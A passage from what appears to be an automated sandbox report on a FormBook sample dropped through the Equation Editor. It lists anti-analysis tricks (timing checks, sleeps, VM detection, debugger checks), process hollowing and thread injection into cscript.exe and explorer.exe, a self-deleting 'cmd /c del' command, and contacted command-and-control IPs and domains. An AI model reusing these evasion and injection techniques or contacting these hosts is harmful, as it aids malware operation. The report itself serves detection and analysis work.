Source: C:\Users\user\AppData\Roaming\word.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079B6E second address: 0000000000079B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2864	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2648	Thread sleep time: -30000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\cscript.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\word.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00405D7C FindFirstFileA,FindClose,		4_2_00405D7C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_004053AA
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00402630 FindFirstFileA,		4_2_00402630

Program exit points

Source: C:\Users\user\AppData\Roaming\word.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\word.exe	API call chain: ExitProcess graph end node

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.488895947.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.488895947.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: word.exe, 00000004.00000002.461029168.00000000005C4000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.469092252.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.474172452.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.507910245.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405DA3

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\word.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_0018E912 mov eax, dword ptr fs:[00000030h]		4_2_0018E912
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_0018EC54 mov eax, dword ptr fs:[00000030h]		4_2_0018EC54
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_0018EC16 mov eax, dword ptr fs:[00000030h]		4_2_0018EC16
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_0018EBD7 mov eax, dword ptr fs:[00000030h]		4_2_0018EBD7
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_0018EB26 mov eax, dword ptr fs:[00000030h]		4_2_0018EB26
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A26F8 mov eax, dword ptr fs:[00000030h]		5_2_009A26F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022E0080 mov ecx, dword ptr fs:[00000030h]		7_2_022E0080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022E00EA mov eax, dword ptr fs:[00000030h]		7_2_022E00EA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023026F8 mov eax, dword ptr fs:[00000030h]		7_2_023026F8

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\word.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 5_2_0040ACE0 LdrLoadDll,

5_2_0040ACE0

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ponto-bras.space
Source: C:\Windows\explorer.exe	Domain query: www.hydrogendatapower.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\word.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 8C0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\word.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\word.exe

Memory written: C:\Users\user\AppData\Roaming\word.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\word.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\word.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.505498445.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463983735.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474315481.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.484524293.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query windows version

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

4_2_00405AA7

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY